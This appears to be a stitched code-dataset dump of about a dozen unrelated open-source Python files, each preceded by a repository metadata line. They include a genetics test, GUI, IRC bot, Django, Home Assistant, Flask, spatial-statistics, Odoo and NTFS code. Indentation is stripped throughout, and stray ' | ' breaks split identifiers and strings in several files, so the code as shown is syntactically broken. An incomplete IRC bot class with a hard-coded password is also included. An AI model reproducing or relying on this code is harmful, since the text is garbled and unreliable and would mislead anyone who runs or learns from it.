# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Genetics problems."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
from tensor2tensor.data_generators import dna_encoder
from tensor2tensor.data_generators import gene_expression
import tensorflow as tf
class GeneticsTest(tf.test.TestCase):
def _oneHotBases(self, bases):
ref = ["A", "C", "T", "G"]
one_hots = []
for base in bases:
one_hot = [False] * 4
if base in ref:
one_hot[ref.index(base)] = True
one_hots.append(one_hot)
return np.array(one_hots)
def testRecordToExample(self | ):
encoder = dna_encoder.DNAEncoder(chunk_size=2)
raw_inputs = ["A", "C", "G", "N", "C", "T"]
# Put in numpy arrays in the same format as in the h5 file
inputs = self._o | neHotBases(raw_inputs)
mask = np.array([True, False, True])
outputs = np.array([[1.0, 2.0, 3.0], [5.0, 1.0, 0.2], [5.1, 2.3, 2.3]])
# Convert to example dict
ex_dict = gene_expression.to_example_dict(encoder, inputs, mask, outputs)
self.assertEqual(len(raw_inputs) // 2 + 1, len(ex_dict["inputs"]))
self.assertAllEqual(encoder.encode(raw_inputs) + [1], ex_dict["inputs"])
self.assertAllEqual([1.0, 0.0, 1.0], ex_dict["targets_mask"])
self.assertAllEqual([1.0, 2.0, 3.0, 5.0, 1.0, 0.2, 5.1, 2.3, 2.3],
ex_dict["targets"])
self.assertAllEqual([3, 3], ex_dict["targets_shape"])
def testGenerateShardArgs(self):
num_examples = 37
num_shards = 4
outfiles = [str(i) for i in range(num_shards)]
shard_args = gene_expression.generate_shard_args(outfiles, num_examples)
starts, ends, fnames = zip(*shard_args)
self.assertAllEqual([0, 9, 18, 27], starts)
self.assertAllEqual([9, 18, 27, 37], ends)
self.assertAllEqual(fnames, outfiles)
if __name__ == "__main__":
tf.test.main()
|
siconos/siconos-deb | externals/renderer/SimpleGui.py | Python | apache-2.0 | 7,843 | 0.00459 | #!/usr/bin/env python
##Copyright 2009-2014 Thomas Paviot (tpaviot@gmail.com)
##
##This file is part of pythonOCC.
##
##pythonOCC is free software: you can redistribute it and/or modify
##it under the terms of the GNU Lesser General Public License as published by
##the Free Software Foundation, either version 3 of the License, or
##(at your option) any later version.
##
##pythonOCC is distributed in the hope that it will be useful,
##but WITHOUT ANY WARRANTY; without even the implied warranty of
##MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
##GNU Lesser General Public License for more details.
##
##You should have received a copy of the GNU Lesser General Public License
##along with pythonOCC. If not, see <http://www.gnu.org/licenses/>.
import sys
from OCC import VERSION
def get_backend():
"""
loads a backend
backends are loaded in order of preference
since python comes with Tk included, but that PySide or PyQt4
is much preferred
"""
try:
from PyQt4 import QtCore, QtGui
return 'qt-pyqt4'
except:
pass
try:
from PySide import QtCore, QtGui
return 'qt-pyside'
except:
pass
# Check wxPython
try:
import wx
return 'wx'
except:
raise ImportError("No compliant GUI library found. You must have either PySide, PyQt4 or wxPython installed.")
sys.exit(1)
def init_display(backend_str=None, size=(1024, 768)):
global display, add_menu, add_function_to_menu, start_display, app, win, USED_BACKEND
if not backend_str:
USED_BACKEND = get_backend()
elif backend_str in ['wx', 'qt-pyside', 'qt-pyqt4']:
USED_BACKEND = backend_str
else:
raise ValueError("You should pass either 'wx','qt' or 'tkinter' to the init_display function.")
sys.exit(1)
# wxPython based simple GUI
if USED_BACKEND == 'wx':
try:
import wx
except:
raise ImportError("Please install wxPython.")
from wxDisplay import wxViewer3d
class AppFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, "Siconos mechanisms visualization based on pythonOCC-%s 3d viewer ('wx' backend)" % VERSION, style=wx.DEFAULT_FRAME_STYLE, size=size)
self.canva = wxViewer3d(self)
self.menuBar = wx.MenuBar()
self._menus = {}
self._menu_methods = {}
def add_menu(self, menu_name):
_menu = wx.Menu()
self.menuBar.Append(_menu, "&"+menu_name)
self.SetMenuBar(self.menuBar)
self._menus[menu_name] = _menu
def add_function_to_menu(self, menu_name, _callable):
# point on curve
_id = wx.NewId()
assert callable(_callable), 'the function supplied is not callable'
try:
self._menus[menu_name].Append(_id, _callable.__name__.replace('_', ' ').lower())
except KeyError:
raise ValueError('the menu item %s does not exist' % menu_name)
self.Bind(wx.EVT_MENU, _callable, id=_id)
app = wx.PySimpleApp()
win = AppFrame(None)
win.Show(True)
wx.SafeYield()
win.canva.InitDriver()
app.SetTopWindow(win)
display = win.canva._display
def add_menu(*args, **kwargs):
win.add_menu(*args, **kwargs)
def add_function_to_menu(*args, **kwargs):
win.add_function_to_menu(*args, **kwargs)
def start_display():
app.MainLoop()
# Qt based simple GUI
elif 'qt' in USED_BACKEND:
from OCC.Display.qtDisplay import qtViewer3d, get_qt_modules
QtCore, QtGui, QtOpenGL = get_qt_modules()
class MainWindow(QtGui.QMainWindow):
def __init__(self, *args):
QtGui.QMainWindow.__init__(self, *args)
self.canva = qtViewer3d(self)
self.setWindowTitle("Siconos mechanisms visualization based on pythonOCC-%s 3d viewer ('%s' backend)" % (VERSION, USED_BACKEND))
self.resize(size[0], size[1])
self.setCentralWidget(self.canva)
if not sys.platform == 'darwin':
self.menu_bar = self.menuBar()
else:
# create a parentless menubar
# see: http://stackoverflow.com/questions/11375176/qmenubar-and-qmenu-doesnt-show-in-mac-os-x?lq=1
# noticeable is that the menu ( alas ) is created in the topleft of the screen, just
# next to the apple icon
# still does ugly things like showing the "Python" menu in bold
self.menu_bar = QtGui.QMenuBar()
self._menus = {}
self._menu_methods = {}
# place the window in the center of the screen, at half the screen size
self.centerOnScreen()
def centerOnScreen(self):
'''Centers the window on the screen.'''
resolution = QtGui.QDesktopWidget().screenGeometry()
self.move((resolution.width() / 2) - (self.frameSize().width() / 2),
(resolution.height() / 2) - (self.frameSize().height() / 2))
def add_menu(self, menu_name):
_menu = self.menu_bar.addMenu("&"+menu_name)
self._menus[menu_name] = _menu
def add_function_to_menu(self, menu_name, _callable):
assert callable(_callable), 'the function supplied is not callable'
try:
_action = QtGui.QAction(_callable.__name__.replace('_', ' ' | ).lower(), self)
# if not, the "exit" action is now shown...
_action.setMenuRole(QtGui.QAction.NoRole)
self.connect(_action, QtCore.SIGNAL("triggered()"), _callable)
self._menus[menu_name].addAction(_a | ction)
except KeyError:
raise ValueError('the menu item %s does not exist' % menu_name)
# following couple of lines is a twek to enable ipython --gui='qt'
app = QtGui.QApplication.instance() # checks if QApplication already exists
if not app: # create QApplication if it doesnt exist
app = QtGui.QApplication(sys.argv)
win = MainWindow()
win.show()
win.canva.InitDriver()
display = win.canva._display
if sys.platform != "linux2":
display.EnableAntiAliasing()
# background gradient
display.set_bg_gradient_color(206, 215, 222, 128, 128, 128)
# display black trihedron
display.display_trihedron()
def add_menu(*args, **kwargs):
win.add_menu(*args, **kwargs)
def add_function_to_menu(*args, **kwargs):
win.add_function_to_menu(*args, **kwargs)
def start_display():
win.raise_() # make the application float to the top
app.exec_()
return display, start_display, add_menu, add_function_to_menu, win, app
if __name__ == '__main__':
display, start_display, add_menu, add_function_to_menu = init_display()
from OCC.BRepPrimAPI import BRepPrimAPI_MakeSphere, BRepPrimAPI_MakeBox
def sphere(event=None):
display.DisplayShape(BRepPrimAPI_MakeSphere(100).Shape(), update=True)
def cube(event=None):
display.DisplayShape(BRepPrimAPI_MakeBox(1, 1, 1).Shape(), update=True)
def exit(event=None):
sys.exit()
add_menu('primitives')
add_function_to_menu('primitives', sphere)
add_function_to_menu('primitives', cube)
add_function_to_menu('primitives', exit)
start_display()
|
taygetea/lwbot | bot.py | Python | mit | 2,345 | 0.004264 | from twisted.words.protocols import irc
from twisted.internet import protocol
import re
import plugins.pomodoro
print plugins.modules
class IrcBot(irc.IRCClient):
def _get_nickname(self):
return self.factory.nickname
nickname = property(_get_nickname)
def signedOn(self):
self.join(self.factory.channel)
print "Signed on as %s." % (self.nickname,)
def joined(self, channel):
print "Joined %s." % (channel,)
"""
< hugaraxia> When a ban is placed by an op, PM the op for a timeframe to remove the ban (accept "10m" or "2h" or "30d"), and then start timer, remove ban when time is up (+random interval to prevent gaming?). If op doesn't reply: Sane default. (5h?) (Perhaps announce ban time, possibly in ##meta: fuzzy them to "short", "long", "very long" to prevent gaming.)
7839-07:12 < hugaraxia> When ban is placed, optionally on very long bans: Start a timer for 1hr: Message #lw-meta that ban discussion on <username> is now allowed.
"""
def privmsg(self, user, channel, msg):
reload(plugins)
print irc.parseModes(msg)
if msg.startswith(self.nickname):
msg = re.compile(self.nickname + "[:,]* ?", re.I).sub('', msg)
prefix = "%s: " % (user.split('!', 1)[0], )
print msg
built = prefix + msg
self.msg(self.factory.channel, built)
else:
prefix = ''
class Bantimer:
def __init | __(self, op, user, channel):
self.operator = op
self.banned = user
self.ch | annel = channel
def timer(self):
def opmsg(self):
IrcBot.privmsg(self.op, self.channel, "ban " + self.user + "?")
class IrcBotFactory(protocol.ClientFactory):
protocol = IrcBot
def __init__(self, channel, nickname='Elua'):
self.channel = channel
self.nickname = nickname
self.password = "password"
def clientConnectionLost(self, connector, reason):
print "Lost connection (%s), reconnecting." % (reason,)
connector.connect()
def clientConnectionFailed(self, connector, reason):
print "Could not connect: %s" % (reason,)
from twisted.internet import reactor
if __name__ == "__main__":
chan = 'bot' #sys.argv[1]
reactor.connectTCP('localhost', 6667, IrcBotFactory('#' + chan))
reactor.run()
|
DemocracyClub/EveryElection | every_election/apps/elections/migrations/0020_auto_20170110_1556.py | Python | bsd-3-clause | 823 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-01-10 15:56
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [("election | s", "0019_auto_20170110_ | 1329")]
operations = [
migrations.AddField(
model_name="electedrole",
name="elected_role_name",
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name="election",
name="group",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="children",
to="elections.Election",
),
),
]
|
mezz64/home-assistant | homeassistant/components/octoprint/__init__.py | Python | apache-2.0 | 7,884 | 0.001268 | """Support for monitoring OctoPrint 3D printers."""
from datetime import timedelta
import logging
from typing import cast
from pyoctoprintapi import ApiError, OctoprintClient, PrinterOffline
import voluptuous as vol
from yarl import URL
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import (
CONF_API_KEY,
CONF_BINARY_SENSORS,
CONF_HOST,
CONF_MONITORED_CONDITIONS,
CONF_NAME,
CONF_PATH,
CONF_PORT,
CONF_SENSORS,
CONF_SSL,
Platform,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from homeassistant.util import slugify as util_slugify
import homeassistant.util.dt as dt_util
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
def has_all_unique_names(value):
"""Validate that printers have an unique name."""
names = [util_slugify(printer["name"]) for printer in value]
vol.Schema(vol.Unique())(names)
return value
def ensure_valid_path(value):
"""Validate the path, ensuring it starts and ends with a /."""
vol.Schema(cv.string)(value)
if value[0] != "/":
value = f"/{value}"
if value[-1] != "/":
value += "/"
return value
PLATFORMS = [Platform.BINARY_SENSOR, Platform.SENSOR]
DEFAULT_NAME = "OctoPrint"
CONF_NUMBER_OF_TOOLS = "number_of_tools"
CONF_BED = "bed"
BINARY_SENSOR_TYPES = [
"Printing",
"Printing Error",
]
BINARY_SENSOR_SCHEMA = vol.Schema(
{
vol.Optional(
CONF_MONITORED_CONDITIONS, default=list(BINARY_SENSOR_TYPES)
): vol.All(cv.ensure_list, [vol.In(BINARY_SENSOR_TYPES)]),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
SENSOR_TYPES = [
"Temperatures",
"Current State",
"Job Percentage",
"Time Remaining",
"Time Elapsed",
]
SENSOR_SCHEMA = vol.Schema(
{
vol.Optional(CONF_MONITORED_CONDITIONS, default=list(SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
CONFIG_SCHEMA = vol.Schema(
vol.All(
cv.deprecated(DOMAIN),
{
DOMAIN: vol.All(
cv.ensure_list,
[
vol.Schema(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_SSL, default=False): cv.boolean,
vol.Optional(CONF_PORT, default=80): cv.port,
vol.Optional(CONF_PATH, default="/"): ensure_valid_path,
# Following values are not longer used in the configuration of the integration
# and are here for historical purposes
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(
CONF_NUMBER_OF_TOOLS, default=0
): cv.positive_int,
vol.Optional(CONF_BED, default=False): cv.boolean,
vol.Optional(CONF_SENSORS, default={}): SENSOR_SCHEMA,
vol.Optional(
CONF_BINARY_SENSORS, default={}
): BINARY_SENSOR_SCHEMA,
}
)
],
has_all_unique_names,
)
},
),
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the OctoPrint component."""
if DOMAIN not in config:
return True
domain_config = config[DOMAIN]
for conf in domain_config:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data={
CONF_API_KEY: conf[CONF_API_KEY],
CONF_HOST: conf[CONF_HOST],
CONF_PATH: conf[CONF_PATH],
CONF_PORT: conf[CONF_PORT],
CONF_SSL: conf[CONF_SSL],
},
)
)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up OctoPrint from a config entry."""
if DOMAIN not in hass.data:
hass.data[DOMAIN] = {}
websession = async_get_clientsession(hass)
client = OctoprintClient(
entry.data[CONF_HOST],
websession,
entry.data[CONF_PORT],
| entry.data[CONF_SSL],
entry.data[CONF_PATH],
)
client.set_api_key(entry.data[CONF_API | _KEY])
coordinator = OctoprintDataUpdateCoordinator(hass, client, entry, 30)
await coordinator.async_config_entry_first_refresh()
hass.data[DOMAIN][entry.entry_id] = {"coordinator": coordinator, "client": client}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
class OctoprintDataUpdateCoordinator(DataUpdateCoordinator):
"""Class to manage fetching Octoprint data."""
config_entry: ConfigEntry
def __init__(
self,
hass: HomeAssistant,
octoprint: OctoprintClient,
config_entry: ConfigEntry,
interval: int,
) -> None:
"""Initialize."""
super().__init__(
hass,
_LOGGER,
name=f"octoprint-{config_entry.entry_id}",
update_interval=timedelta(seconds=interval),
)
self.config_entry = config_entry
self._octoprint = octoprint
self._printer_offline = False
self.data = {"printer": None, "job": None, "last_read_time": None}
async def _async_update_data(self):
"""Update data via API."""
printer = None
try:
job = await self._octoprint.get_job_info()
except ApiError as err:
raise UpdateFailed(err) from err
# If octoprint is on, but the printer is disconnected
# printer will return a 409, so continue using the last
# reading if there is one
try:
printer = await self._octoprint.get_printer_info()
except PrinterOffline:
if not self._printer_offline:
_LOGGER.debug("Unable to retrieve printer information: Printer offline")
self._printer_offline = True
except ApiError as err:
raise UpdateFailed(err) from err
else:
self._printer_offline = False
return {"job": job, "printer": printer, "last_read_time": dt_util.utcnow()}
@property
def device_info(self) -> DeviceInfo:
"""Device info."""
unique_id = cast(str, self.config_entry.unique_id)
configuration_url = URL.build(
scheme=self.config_entry.data[CONF_SSL] and "https" or "http",
host=self.config_entry.data[CONF_HOST],
port=self.config_entry.data[CONF_PORT],
path=self.config_entry.data[CONF_PATH],
)
return DeviceInfo(
identifiers={(DOMAIN, unique_id)},
manufacturer="OctoPrint",
name="OctoPrint",
configuration_url=str(configuration_url),
)
|
tkalus/fogspoon | fogspoon/api/__init__.py | Python | mit | 1,585 | 0 | # -*- coding: utf-8 -*-
import simplejson as json
from functools import wraps
from flask import current_app, jsonify, request
from ..core import FogspoonError
from ..helpers import JSONEncoder
from .. impo | rt factory
def create_app(settings_override=None):
"""Returns the Fogspoon API application instance"""
app = factory.create_app(__name__, __path__, settings_override)
# Set the default JSON encoder
app.json_encoder = JSONEncoder
# Register custom error handlers
app.errorhandler(FogspoonError)(on_fogspoon_error)
app.errorhandler(404)(on_404)
return app
def route(bp, *args, **kwargs):
"""
| decorator that does blueprint fun and jsonify for api calls
"""
kwargs.setdefault('strict_slashes', False)
def decorator(f):
@bp.route(*args, **kwargs)
@wraps(f)
def wrapper(*args, **kwargs):
sc = 200
rv = f(*args, **kwargs)
if isinstance(rv, tuple):
sc = rv[1]
rv = rv[0]
# JSONP support too!
callback = request.args.get('callback', False)
if callback:
content = str(callback) + '(' + json.dumps(rv) + ')'
mimetype = 'application/javascript'
return current_app.response_class(content, mimetype=mimetype)
else:
return jsonify(dict(data=rv)), sc
return f
return decorator
def on_fogspoon_error(e):
return jsonify(dict(error=e.msg)), 400
def on_404(e):
return jsonify(dict(error='Not found')), 404
|
sjsrey/pysal_core | pysal_core/weights/tests/test_spatial_lag.py | Python | bsd-3-clause | 2,394 | 0.00543 |
import os
import unittest
from ..weights import W
from ..util import lat2W
from ..spatial_lag import lag_spatial, lag_categorical
import numpy as np
class Test_spatial_lag(unittest.TestCase):
def setUp(self):
self.neighbors = {'c': ['b'], 'b': ['c', 'a'], 'a': ['b']}
self.weights = {'c': [1.0], 'b': [1.0, 1.0], 'a': [1.0]}
self.id_order = ['a', 'b', 'c']
self.weights = {'c': [1.0], | 'b': [1.0, 1.0], 'a': [1.0]}
self.w = W(self.neighbors, self.weights, self.id_order)
self.y = np.array([0, 1, 2])
self.wlat = lat2W(3, 3)
self.ycat = ['a','b','a','b','c','b','c','b','c']
self.ycat2 = ['a', 'c', 'c', 'd', 'b', 'a', 'd', 'd', 'c']
self.ym = | np.vstack((self.ycat,self.ycat2)).T
self.random_seed = 503
def test_lag_spatial(self):
yl = lag_spatial(self.w, self.y)
np.testing.assert_array_almost_equal(yl, [1., 2., 1.])
self.w.id_order = ['b', 'c', 'a']
y = np.array([1, 2, 0])
yl = lag_spatial(self.w, y)
np.testing.assert_array_almost_equal(yl, [2., 1., 1.])
w = lat2W(3, 3)
y = np.arange(9)
yl = lag_spatial(w, y)
ylc = np.array([4., 6., 6., 10., 16., 14., 10., 18., 12.])
np.testing.assert_array_almost_equal(yl, ylc)
w.transform = 'r'
yl = lag_spatial(w, y)
ylc = np.array(
[2., 2., 3., 3.33333333, 4.,
4.66666667, 5., 6., 6.])
np.testing.assert_array_almost_equal(yl, ylc)
def test_lag_categorical(self):
yl = lag_categorical(self.wlat, self.ycat)
np.random.seed(self.random_seed)
known = np.array(['b', 'a', 'b', 'c', 'b', 'c', 'b', 'c', 'b'])
np.testing.assert_array_equal(yl, known)
ym_lag = lag_categorical(self.wlat,self.ym)
known = np.array([['b', 'b'],
['a', 'c'],
['b', 'c'],
['c', 'd'],
['b', 'd'],
['c', 'c'],
['b', 'd'],
['c', 'd'],
['b', 'b']])
np.testing.assert_array_equal(ym_lag, np.asarray(known))
suite = unittest.TestLoader().loadTestsFromTestCase(Test_spatial_lag)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite)
|
gisce/OCB | openerp/addons/base/res/res_partner.py | Python | agpl-3.0 | 41,659 | 0.005329 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
from lxml import etree
import math
import pytz
import re
import openerp
from openerp import SUPERUSER_ID
from openerp import pooler, tools
from openerp.osv import osv, fields, orm
from openerp.osv.expression import get_unaccent_wrapper
from openerp.tools.translate import _
from openerp.tools.yaml_import import is_comment
class format_address(object):
def fields_view_get_address(self, cr, uid, arch, context={}):
user_obj = self.pool.get('res.users')
fmt = user_obj.browse(cr, SUPERUSER_ID, uid, context).company_id.country_id
fmt = fmt and fmt.address_format
layouts = {
'%(city)s %(state_code)s\n%(zip)s': """
<div class="address_format">
<field name="city" placeholder="City" style="width: 50%%"/>
<field name="state_id" class="oe_no_button" placeholder="State" style="width: 47%%" options='{"no_open": true}'/>
<br/>
<field name="zip" placeholder="ZIP"/>
</div>
""",
'%(zip)s %(city)s': """
<div class="address_format">
<field name="zip" placeholder="ZIP" style="width: 40%%"/>
<field name="city" placeholder="City" style="width: 57%%"/>
<br/>
<field name="state_id" class="oe_no_button" placeholder="State" options='{"no_open": true}'/>
</div>
""",
'%(city)s\n%(state_name)s\n%(zip)s': """
<div class="address_format">
<field name="city" placeholder="City"/>
<field name="state_id" class="oe_no_button" placeholder="State" options='{"no_open": true}'/>
<field name="zip" placeholder="ZIP"/>
</div>
"""
}
for k,v in layouts.items():
if fmt and (k in fmt):
doc = etree.fromstring(arch)
for node in doc.xpath("//div[@class='address_format']"):
tree = etree.fromstring(v)
node.getparent().replace(node, tree)
arch = etree.tostring(doc)
break
return arch
def _tz_get(self,cr,uid, context=None):
# put POSIX 'Etc/*' entries at the end to avoid confusing users - see bug 1086728
return [(tz,tz) for tz in sorted(pytz.all_timezones, key=lambda tz: tz if not tz.startswith('Etc/') else '_')]
class res_partner_category(osv.osv):
def name_get(self, cr, uid, ids, context=None):
""" Return the categories' display name, including their direct
parent by default.
If ``context['partne | r_category_display']`` is ``'short'``, the short
version of the category name (without the direct parent) is used.
The default is the long version.
"""
if not isinstance(ids, list):
ids = [ids]
if context is None:
context = {}
if context.get('partner_category_display') == 'short':
return super(res_partner_category, self).name_get(cr, uid, ids, con | text=context)
res = []
for category in self.browse(cr, uid, ids, context=context):
names = []
current = category
while current:
names.append(current.name)
current = current.parent_id
res.append((category.id, ' / '.join(reversed(names))))
return res
def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
if not context:
context = {}
if name:
# Be sure name_search is symetric to name_get
name = name.split(' / ')[-1]
ids = self.search(cr, uid, [('name', operator, name)] + args, limit=limit, context=context)
else:
ids = self.search(cr, uid, args, limit=limit, context=context)
return self.name_get(cr, uid, ids, context)
def _name_get_fnc(self, cr, uid, ids, prop, unknow_none, context=None):
res = self.name_get(cr, uid, ids, context=context)
return dict(res)
_description = 'Partner Categories'
_name = 'res.partner.category'
_columns = {
'name': fields.char('Category Name', required=True, size=64, translate=True),
'parent_id': fields.many2one('res.partner.category', 'Parent Category', select=True, ondelete='cascade'),
'complete_name': fields.function(_name_get_fnc, type="char", string='Full Name'),
'child_ids': fields.one2many('res.partner.category', 'parent_id', 'Child Categories'),
'active': fields.boolean('Active', help="The active field allows you to hide the category without removing it."),
'parent_left': fields.integer('Left parent', select=True),
'parent_right': fields.integer('Right parent', select=True),
'partner_ids': fields.many2many('res.partner', id1='category_id', id2='partner_id', string='Partners'),
}
_constraints = [
(osv.osv._check_recursion, 'Error ! You can not create recursive categories.', ['parent_id'])
]
_defaults = {
'active': 1,
}
_parent_store = True
_parent_order = 'name'
_order = 'parent_left'
class res_partner_title(osv.osv):
_name = 'res.partner.title'
_order = 'name'
_columns = {
'name': fields.char('Title', required=True, size=46, translate=True),
'shortcut': fields.char('Abbreviation', size=16, translate=True),
'domain': fields.selection([('partner', 'Partner'), ('contact', 'Contact')], 'Domain', required=True, size=24)
}
_defaults = {
'domain': 'contact',
}
def _lang_get(self, cr, uid, context=None):
lang_pool = self.pool.get('res.lang')
ids = lang_pool.search(cr, uid, [], context=context)
res = lang_pool.read(cr, uid, ids, ['code', 'name'], context)
return [(r['code'], r['name']) for r in res]
# fields copy if 'use_parent_address' is checked
ADDRESS_FIELDS = ('street', 'street2', 'zip', 'city', 'state_id', 'country_id')
POSTAL_ADDRESS_FIELDS = ADDRESS_FIELDS # deprecated, to remove after 7.0
class res_partner(osv.osv, format_address):
_description = 'Partner'
_name = "res.partner"
def _address_display(self, cr, uid, ids, name, args, context=None):
res = {}
for partner in self.browse(cr, uid, ids, context=context):
res[partner.id] = self._display_address(cr, uid, partner, context=context)
return res
def _get_image(self, cr, uid, ids, name, args, context=None):
result = dict.fromkeys(ids, False)
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = tools.image_get_resized_images(obj.image)
return result
def _get_tz_offset(self, cr, uid, ids, name, args, context=None):
result = dict.fromkeys(ids, False)
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = datetime.datetime.now(pytz.timezone(obj.tz or 'GMT')).strftime('%z')
return result
def _set_image(self, cr, uid, id, name, value, arg |
ekivemark/bofhirdev | accounts/forms/other.py | Python | gpl-2.0 | 2,816 | 0.002131 | """
accounts
FILE: forms.py
Created: 6/21/15 8:31 PM
"""
__author__ = 'Mark Scrimshire:@ekivemark'
from django.conf import settings
from django import forms
from django.utils.safestring import mark_safe
from registration.forms import (RegistrationFormUniqueEmail,
RegistrationFormTermsOfService)
from accounts.models import User
class Email(forms.EmailField):
def clean(self, value):
if settings.DEBUG:
print("email is ", value)
value = value.lower()
super(Email, self).clean(value)
try:
User.objects.get(email=value)
raise forms.ValidationError(mark_safe(
"This email is already registered. <br/>Use <a href='/password/reset'>this forgot password</a> link or on the <a href ='/accounts/login?next=/'>login page</a>."))
except User.DoesNotExist:
if settings.DEBUG:
print("no match on user:", value)
return value
class UserRegistrationForm(forms.ModelForm):
"""
A form for creating new users. Includes all the required
fields, plus a repeated password.
"""
# email will be become username
email = Email()
password1 = forms.CharField(widget=forms.PasswordInput(),
label="Password")
password2 = forms.CharField(widget=forms.PasswordInput(),
label="Repeat your password")
fields = ['user', 'email', 'password1', 'password2' ]
def clean_user(self):
"""
We need to check that user is not containing spaces.
We also need to make sure it is lower case
:return: self
"""
data = self.cleaned_data['user']
# remove spaces
data = data.replace(" ", "")
# Convert to lowercase
data = data.lower()
if data == "":
raise forms.ValidationError("User name is required")
if settings.DEBUG:
print("User: ", self.cleaned_data['user'], " = [",data, "]" )
return data
def clean_password(self):
if self.data['password1'] != self.data['password2']:
raise forms.ValidationError('Passwords are not the same')
return self.data['password1']
class RegistrationFormUserTOSAndEmail(UserRegistrationForm,
RegistrationFormUniqueEmail,
| RegistrationFormTermsOfService,
):
class Meta:
model = User
fields = ['user',
'email',
'first_name',
'last_name']
# exclude = ['us | er']
# pass
class RegistrationFormTOSAndEmail(
RegistrationFormUniqueEmail,
RegistrationFormTermsOfService,
):
pass
|
joachimmetz/dfvfs | dfvfs/vfs/ntfs_directory.py | Python | apache-2.0 | 1,709 | 0.005851 | # -*- coding: utf-8 -*-
"""The NTFS directory implementation."""
from dfvfs.lib import errors
from dfvfs.path import ntfs_path_spec
from dfvfs.vfs import directory
class NTFSDirectory(directory.Directory):
"""File system directory that uses pyfsntfs."""
_FILE_REFERENCE_MFT_ENTRY_BITMASK = 0xffffffffffff
def _EntriesGenerator(self):
"""Retrieves directory entries.
Since a directory can contain a vast number of entries using
a generator is more memory efficient.
Yields:
NTFSPathSpec: NTFS path specification.
"""
try:
fsntfs_file_entry = self._file_system.GetNTFSFileEntryByPathSpec(
self.path_spec)
except errors.PathSpecError:
fsntfs_file_entry = None
if fsntfs_file_entry:
location = getattr(self.path_spec, 'location', None)
for fsntfs_sub_file_entry in fsn | tfs_file_entry.sub_file_entries:
directory_entry = fsntfs_sub_file_entry.name
# Ignore references to self or parent.
if directory_entry in ('.', '..'):
continue
file_reference = fsntfs_sub_file_entry.file_reference
directory_entry_mft_entry = (
file_reference & self. | _FILE_REFERENCE_MFT_ENTRY_BITMASK)
if not location or location == self._file_system.PATH_SEPARATOR:
directory_entry = self._file_system.JoinPath([directory_entry])
else:
directory_entry = self._file_system.JoinPath([
location, directory_entry])
yield ntfs_path_spec.NTFSPathSpec(
location=directory_entry,
mft_attribute=fsntfs_sub_file_entry.name_attribute_index,
mft_entry=directory_entry_mft_entry, parent=self.path_spec.parent)
|
panosl/helios | helios/store/forms.py | Python | bsd-3-clause | 1,013 | 0 | from django import forms
from django.core.exceptions import ObjectDoesNotExist
from helios.store.models import Category
from helios.conf import settings
if settings.USE_PAYPAL:
from helios.paypal.forms import *
class MyCategoryAdminForm(forms.ModelForm):
class Meta:
model = Category
fields = '__all__'
def clean_parent(self):
slug = self.cleaned_dat | a['slug']
parent = self.cleaned_data['parent']
if slug and parent:
try:
this_category = Category.objects.get(slug=slug)
parent_category = Category.objects.get(pk=int(parent.id))
if (
parent_category.id == this_category.id
or parent_categor | y.parent == this_category
):
raise forms.ValidationError(
'Can\'t have a category as parent of itself.'
)
except ObjectDoesNotExist:
pass
return parent
|
vesellov/visio2python | automat.py | Python | lgpl-3.0 | 12,453 | 0.007147 | #!/usr/bin/python
#automat.py
#
# <<<COPYRIGHT>>>
#
#
#
#
"""
.. module:: automat
This is the base class for State Machine.
You can read more about `Automata-based programming <http://en.wikipedia.org/wiki/Automata-based_programming>`_
principles and learn how to develop your project in such way.
